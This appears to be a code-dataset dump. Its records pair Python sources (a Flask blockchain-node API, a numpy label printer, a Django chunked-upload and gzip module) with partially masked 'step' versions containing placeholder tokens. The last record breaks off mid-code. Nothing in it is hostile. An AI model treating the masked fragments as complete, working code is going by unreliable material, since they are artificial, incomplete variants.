"step-3": "<mask token>\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-4": "from flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-5": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\n\nfm = filemanager()\nnode = Node(fm)\n\napp = Flask(__name__)\n\[email protected](\"/transactions/isfull\",methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\[email protected](\"/transactions/new\",methods=[\"POST\"])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(),transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\[email protected](\"/chain/last\",methods=[\"GET\"])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\[email protected](\"/chain\",methods=[\"GET\"])\ndef get_chain():\n return jsonify(node.chain), 200\[email protected](\"/pnodes/register\",methods=[\"POST\"])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes)==list:\n if len(nodes)>10 and nodes!=[]:\n nodes = nodes[:10]\n s = [] #succeed\n f = [] #failed\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {\"Added PNodes\":s,\n \"Not added pnodes\":f}\n return jsonify(resp), 200\n resp = {\"Error\":\"Input format error\"}\n return jsonify(resp), 400\[email protected](\"/pnodes/size\",methods=[\"GET\"])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\[email protected](\"/nodes\",methods=[\"GET\"])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\[email protected](\"/nodes/resolve\",methods=[\"GET\"])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return \"0 nodes added\",400\n\[email protected](\"/chain/resolve\",methods=[\"GET\"])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print(\"Nothing\")\n return jsonify(r), 400\[email protected](\"/mine\",methods=[\"GET\"])\ndef mine():\n mb = node.mine()\n resp = {\"Mined_block\":mb}\n return jsonify(resp), 200\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\",\"--port\",default=node.DEFAULT_PORT,type=int,help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port=port\n app.run(host=\"\",port=port)\n \n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
import numpy as np
labels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')
for lab in labels:
print(lab)
|
normal
|
{
"blob_id": "a83988e936d9dee4838db61c8eb8ec108f5ecd3f",
"index": 4669,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor lab in labels:\n print(lab)\n",
"step-3": "<mask token>\nlabels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')\nfor lab in labels:\n print(lab)\n",
"step-4": "import numpy as np\nlabels = np.load('DataVariationOther/w1_s500/targetTestNP.npy')\nfor lab in labels:\n print(lab)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'fshaw'
import gzip
import hashlib
import os
import uuid
import json
import jsonpickle
from chunked_upload.models import ChunkedUpload
from chunked_upload.views import ChunkedUploadView, ChunkedUploadCompleteView
from django.conf import settings
from django.core import serializers
from django.core.files.base import ContentFile
from django.http import HttpResponse
from django.template.context_processors import csrf
from rest_framework.renderers import JSONRenderer
import web.apps.web_copo.schemas.utils.data_utils as d_utils
import web.apps.web_copo.utils.EnaUtils as u
from dal.broker_da import BrokerDA
from dal.copo_da import DataFile
from web.apps.web_copo.rest.models import CopoChunkedUpload
class CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):
do_md5_check = False
def get_response_data(self, chunked_upload, request):
"""
Data for the response. Should return a dictionary-like object.
Called *only* if POST is successful.
"""
files = {'files': {}}
files['files']['name'] = chunked_upload.filename
files['files']['id'] = chunked_upload.id
files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)
files['files']['url'] = ''
files['files']['thumbnailUrl'] = ''
files['files']['deleteUrl'] = ''
files['files']['deleteType'] = 'DELETE'
str = jsonpickle.encode(files)
return files
class CopoChunkedUploadView(ChunkedUploadView):
model = CopoChunkedUpload
'''
'''
class JSONResponse(HttpResponse):
"""
An HttpResponse that renders its content into JSON.
"""
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
def receive_data_file(request):
# this method is called for writing smaller files (<= 260MB) to disk, larger files use the
# upload method in ChunkedUpload class
from django.utils import timezone
# need to make a chunked upload record to store deails of the file
if request.method == 'POST':
c = {}
f = request.FILES['file']
fname = f.__str__()
attrs = {'user': request.user, 'filename': fname, 'completed_on': timezone.now(), 'offset': f.size}
chunked_upload = ChunkedUpload(**attrs)
# file starts empty
chunked_upload.file.save(name='', content=ContentFile(''), save=True)
path = chunked_upload.file
destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name), 'wb+')
for chunk in f.chunks():
destination.write(chunk)
destination.close()
c.update(csrf(request))
# create output structure to pass back to jquery-upload
files = {'files': {}}
files['files']['name'] = f._name
files['files']['size'] = path.size / (1000 * 1000.0)
files['files']['id'] = chunked_upload.id
files['files']['url'] = ''
files['files']['thumbnailUrl'] = ''
files['files']['deleteUrl'] = ''
files['files']['deleteType'] = 'DELETE'
str = jsonpickle.encode(files)
return HttpResponse(str, content_type='json')
def resume_chunked(request):
file_name = request.GET.get('filename')
user_id = request.user.id
# retrieve incomplete file for user with this name
d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id, filename=file_name).order_by(
'-offset')[:1]
if d:
out = serializers.serialize('json', d)
return HttpResponse(jsonpickle.encode(out))
else:
return HttpResponse(jsonpickle.encode(''))
def get_partial_uploads(request):
user_id = request.user.id
d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id).order_by('created_on')
if d:
out = serializers.serialize('json', d)
return HttpResponse(jsonpickle.encode(out))
else:
return HttpResponse(jsonpickle.encode(''))
def hash_upload(request):
# utility method to create an md5 hash of a given file path
# open uploaded file
file_id = request.GET['file_id']
print('hash started ' + file_id)
file_obj = ChunkedUpload.objects.get(pk=file_id)
file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)
# now hash opened file
md5 = hashlib.md5()
with open(file_name, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
md5.update(chunk)
file_obj.hash = md5.hexdigest()
file_obj.save()
output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}
# update record in mongo
record_object = DataFile().get_by_file_id(file_id)
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_hash")] = file_obj.hash
profile_id = request.session['profile_id']
component = "datafile"
BrokerDA(target_id=str(record_object.get("_id", str())),
component=component,
auto_fields=auto_fields
).do_save_edit()
out = json.dumps(output_dict)
print('hash complete ' + file_id)
return HttpResponse(out, content_type='json')
def inspect_file(request):
# utility method to examine a file and return meta-data to the frontend
output_dict = {'file_type': 'unknown', 'do_compress': False}
# get reference to file
file_id = request.GET['file_id']
chunked_upload = ChunkedUpload.objects.get(id=int(file_id))
file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)
# size threshold to determine if a file should be compressed
zip_threshold = 200000000 # size in bytes
# check if file is compressed
is_zipped = u.is_gzipped(file_name)
if chunked_upload.offset >= zip_threshold and not is_zipped:
output_dict['do_compress'] = True
# check for file type
if u.is_pdf_file(file_name):
output_dict['file_type'] = 'pdf'
else:
try:
if u.is_fastq_file(file_name):
output_dict['file_type'] = 'fastq'
if not is_zipped:
output_dict['do_compress'] = True
elif u.is_sam_file(file_name):
output_dict['file_type'] = 'sam'
if not is_zipped:
output_dict['do_compress'] = False
elif u.is_bam_file(file_name):
output_dict['file_type'] = 'bam'
if not is_zipped:
output_dict['do_compress'] = False
else: # make file type same as extension
output_dict['file_type'] = chunked_upload.filename.rsplit('.')[1]
except:
output_dict['file_type'] = 'unknown'
# add datafile schema
chunked_upload.type = output_dict['file_type']
chunked_upload.save()
# ...and obtain the inserted record
profile_id = request.session['profile_id']
component = "datafile"
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_id")] = file_id
auto_fields[DataFile().get_qualified_field("file_type")] = output_dict['file_type']
auto_fields[DataFile().get_qualified_field("file_location")] = file_name
auto_fields[DataFile().get_qualified_field("file_size")] = u.filesize_toString(chunked_upload.offset)
auto_fields[DataFile().get_qualified_field("name")] = chunked_upload.filename
# get default type from schema
type = [f for f in d_utils.get_copo_schema(component) if f.get("id").split(".")[-1] == "type"]
if type:
type = type[0]["default_value"]
auto_fields[DataFile().get_qualified_field("type")] = type
df = BrokerDA(context=dict(),
profile_id=profile_id,
component=component,
auto_fields=auto_fields,
visualize="last_record"
).do_save_edit().get("record_object", dict())
out = jsonpickle.encode(output_dict)
return HttpResponse(out, content_type='json')
def zip_file(request):
# need to get a reference to the file to zip
file_id = request.GET['file_id']
print("zip started " + file_id)
file_obj = ChunkedUpload.objects.get(pk=file_id)
# get the name of the file to zip and change its suffix to .gz
output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)
output_file_name = file_obj.filename + '.gz'
try:
# open the file as gzip acrchive...set compression level
temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) + '.tmp')
myzip = gzip.open(temp_name, 'wb', compresslevel=1)
src = open(output_file_location, 'r')
# write input file to gzip archive in n byte chunks
n = 100000000
for chunk in iter(lambda: src.read(n), ''):
myzip.write(bytes(chunk, 'UTF-8'))
finally:
myzip.close()
src.close()
print('zip complete ' + file_id)
# now need to delete the old file and update the file record with the new file
new_file_name = output_file_location + '.gz'
os.rename(temp_name, new_file_name)
os.remove(output_file_location)
# calculate new file size
stats = os.stat(new_file_name)
new_file_size = stats.st_size / 1000 / 1000
# update filename
file_obj.filename = output_file_name
file_obj.file.name = new_file_name
# update file size
file_obj.offset = stats.st_size
file_obj.save()
out = {'zipped': True, 'file_name': output_file_name, 'file_size': new_file_size}
# update record in mongo
record_object = DataFile().get_by_file_id(file_id)
auto_fields = dict()
auto_fields[DataFile().get_qualified_field("file_size")] = u.filesize_toString(file_obj.offset)
auto_fields[DataFile().get_qualified_field("name")] = output_file_name
auto_fields[DataFile().get_qualified_field("file_location")] = new_file_name
profile_id = request.session['profile_id']
component = "datafile"
BrokerDA(target_id=str(record_object.get("_id", str())),
component=component,
auto_fields=auto_fields
).do_save_edit()
out = jsonpickle.encode(out)
return HttpResponse(out, content_type='json')
|
normal
|
{
"blob_id": "2b7415d86f9157ae55228efdd61c9a9e9920bc5c",
"index": 7716,
"step-1": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\n<mask token>\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n file_id = request.GET['file_id']\n print('zip started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name\n )\n output_file_name = file_obj.filename + '.gz'\n try:\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) +\n '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n n = 100000000\n for chunk in iter(lambda : src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n print('zip complete ' + file_id)\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n file_obj.filename = output_file_name\n file_obj.file.name = 